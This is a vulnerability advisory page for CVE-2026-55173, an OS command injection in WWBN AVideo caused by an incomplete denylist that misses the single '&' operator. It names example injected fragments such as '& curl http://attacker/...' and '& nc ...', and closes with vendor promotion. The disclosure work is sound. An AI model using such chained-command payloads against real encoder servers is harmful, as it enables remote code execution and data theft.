CVE-2026-55173
Last modified
CVE-2026-55173 is a high-severity vulnerability rated 8.1/10 on the CVSS scale. WWBN AVideo is an open source video platform. Versions 29.0 and below remain vulnerable to OS command injection because the fix for CVE-2026-33482 was incomplete and still does not neutralize a single & ( the shell background operator). EPSS estimates a 3.43% chance of exploitation in the next 30 days.
Description
WWBN AVideo is an open source video platform. Versions 29.0 and below remain vulnerable to OS command injection because the fix for CVE-2026-33482 was incomplete and still does not neutralize a single & ( the shell background operator). CVE-2026-33482 reported that sanitizeFFmpegCommand() (plugin/API/standAlone/functions.php) failed to strip $(...) command substitution, allowing OS command injection at the execAsync() sh -c sink. The fix (commit 25c8ab90) added $, (, ), {, }, \n, \r to the denylist character class and a str_replace('&&', '', ...), but did not account for the single &. ffmpeg.json.php builds the command from _decryptString(getInput('codeToExecEncrypted')). This is the same threat model the original advisory accepted (“an attacker who can craft a valid encrypted payload can achieve arbitrary command execution on the standalone encoder server”) and the same CVSS basis (AV:N/AC:H/PR:N). Multiple &-separated commands can be chained (e.g. download + execute). Redirect-based payloads are blocked by the > strip, but command execution (e.g. & curl http://attacker/..., & nc ..., dropping/running a file) is not. This issue has been patched by this commit: https://github.com/WWBN/AVideo/commit/c1cfa2bea8a351a1d07f5758f82887403e3abf1f.
Metrics
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
Weakness Enumeration
Affected Software
Source: CNA advisory (CVE.org). NVD analysis pending.
| Vendor | Product | Versions |
|---|---|---|
| WWBN | AVideo | <= 29.0 |
References
Timeline
- Published
- Last Modified
- Status
- Deferred
Frequently Asked Questions
What is CVE-2026-55173?
How severe is CVE-2026-55173?
How do I fix CVE-2026-55173?
How Strix Helps
- How Strix found a critical auth bypass in etcdStrix autonomously discovered a critical authentication bypass in etcd, later designated CVE-2026-33413.
- Autonomous PentestingAI agents that find and validate exploitable vulnerabilities like this one across your applications.
- PR ReviewsPentest every pull request so vulnerable code is caught before it ships to production.
- AI Penetration TestingHow AI-driven penetration testing continuously covers your attack surface.
Related CVEs from 2026
- CVE-2026-55144Missing cryptographic step in Windows CryptoAPI allows an au…7.1
- CVE-2026-55145Improper neutralization of special elements used in a comman…7.1
- CVE-2026-5515IBM App Connect Enterprise 13.0.1.0 through 13.0.7.0 stores …5.5
- CVE-2026-55153mchange-commons-java is a Java library of shared utility cla…7.1
- CVE-2026-5516IBM WebSphere Application Server - Liberty 22.0.0.11 through…5.9
- CVE-2026-55170OpenFGA is an authorization/permission engine built for deve…5.4
- CVE-2026-55175Spinnaker is an open source, multi-cloud continuous delivery…7.5
- CVE-2026-55180pnpm is a package manager. Prior to 10.34.2 and 11.5.3, pnpm…6.5
- CVE-2026-55187Mailpit is an email testing tool and API for developers. Pri…5.8
- CVE-2026-55188RustFS is a distributed object storage system built in Rust.…8.2
- CVE-2026-55189RustFS is a distributed object storage system built in Rust.…7.7
- CVE-2026-55195py7zr is a Python-based library and utility to support 7zip …8.7
Are you affected by CVE-2026-55173?
Run a free Strix scan to check your systems for this vulnerability.
Scan your code nowSource: NVD / NIST
